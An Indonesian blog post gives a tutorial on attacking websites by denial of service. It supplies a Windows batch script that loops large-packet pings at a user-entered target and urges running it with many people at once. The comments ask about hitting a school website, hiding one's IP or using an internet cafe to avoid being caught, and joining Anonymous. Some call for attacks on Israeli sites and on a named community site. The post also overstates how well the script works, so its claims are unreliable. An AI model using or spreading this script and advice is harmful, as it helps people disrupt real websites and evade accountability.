Selasa, 30 Oktober 2012

Cara Menyerang Suatu situs dengan menggunakan DDOS

DDOS atau Distributed Denial Of Services adalah suatu cara menyerang suatu situs dengan melumpuhkan sumber daya situs yang dituju dengan mengirimkan beberapa paket secara terus menerus hingga situs down




Kali ini kita akan coba DDOS dengan menggunakan cmd / command promp, sebelumnya kita copy paste kan script berikut ke notepad


@echo off 
mode 67,16 
title DDOS Attack 
color 0a 
cls 
echo. 
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
echo DDOS With Batchfile 
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
echo. 
set /p x=Server-Target: 
echo. 
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
ping %x% 
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul 
goto Next 
:Next 
echo. 
echo. 
echo. 
set /p m=ip Host: 
echo. 
set /p n=Packet Size: 
echo. 
:DDOS 
color 0c 
echo Attacking Server %m% 
ping %m% -i %n% -t >nul 
goto DDOS  


Simpan Script diatas dengan nama DDOS.bat dan dengan format all files, lalu buka lagi DDOS.bat yang baru saja kita buat seperti berikut :


Server-target isikan dengan nama domain / nama situs yang akan kita DDOS, misal disini saya akan DDOS situs lokal saya sendiri yaitu www.ekoskanifo.com


Setelah kita isikan server-target maka akan muncul alamat ip target seperti diatas, lalu pada ip host isikan ip address target kita seperti gambar diatas

Lalu akan ada packet size, isikan terserah anda misalkan 1000000000


Setelah itu tekan enter maka proses DDOS akan berjalan, DDOS membutuhkan waktu yang lumayan lama tergantung kemampuan situs yang kita DDOS. Akan lebih baik kalau kita melakukan DDOS secara serentak atau dengan banyak orang, .

21 komentar:

  1. kalo nyerang blog bisa gg gan

    BalasHapus
    Balasan
    1. sakit bnr gan nyerang blog wkwkkww

      Hapus
    2. Blog ga bisa ya gan ? kenapa tuh ?

      Hapus
  2. cara ngecek ip situs lain gimana gan?

    BalasHapus
    Balasan
    1. .tinggal masuk ke commandpromp (cmd) lali ketikan "ping situs lain", misal ping facebook.com maka nanti akan muncul ip'nya

      Hapus
  3. masih bingung gan

    BalasHapus
  4. kalo kita serang sebuah situs. bisa ketahuan gak gan kalo kita yang nyerang

    BalasHapus
    Balasan
    1. .bakal ketahuan gan, makanya ane jga share cara menyembnyikan Ip Public biar gk ketahuan

      Hapus
  5. barusan kan ane di attack
    nah ane mau attack balik pake source code nya
    bisa gk tuh ?

    BalasHapus
  6. gan, taw grupnya hacker gak aq newbe pngen gabung

    dimas_purnomo75@yahoo.com

    BalasHapus
    Balasan
    1. GAbung aja ke anonymous ,, cari di fb klo bagian indonesia nama groupnya anonymous indonesia .

      Hapus
  7. bang kayakmana cara save filenya ???

    BalasHapus
  8. thank infonya

    BalasHapus
  9. kalo nyerang bisa ketahuan ? ane coba ama website sekolah d kampung ane !

    BalasHapus
    Balasan
    1. okwokwwok mampos tunggu ketangkep polisi lu

      Hapus
  10. Lewat warnet paling aman gan, :-)

    BalasHapus
    Balasan
    1. Ga aman bro, wildan hacker jember team aja ketangkep :D

      Kalau mau coba biar ga ketahuan pake penyembunyi alamat ip

      Coba serang situs israel buat #OpIsrael tanggal 11 september

      Hapus
  11. bantu DDos situs nya pekalongan community donk...
    Soalnya sangat meresahkan untuk para gamer pb...

    BalasHapus
  12. benr tuh irfan akbar
    pekalongan sangatmeresahkan untuk para gamers
    jadi tolong bantu DDOS

    BalasHapus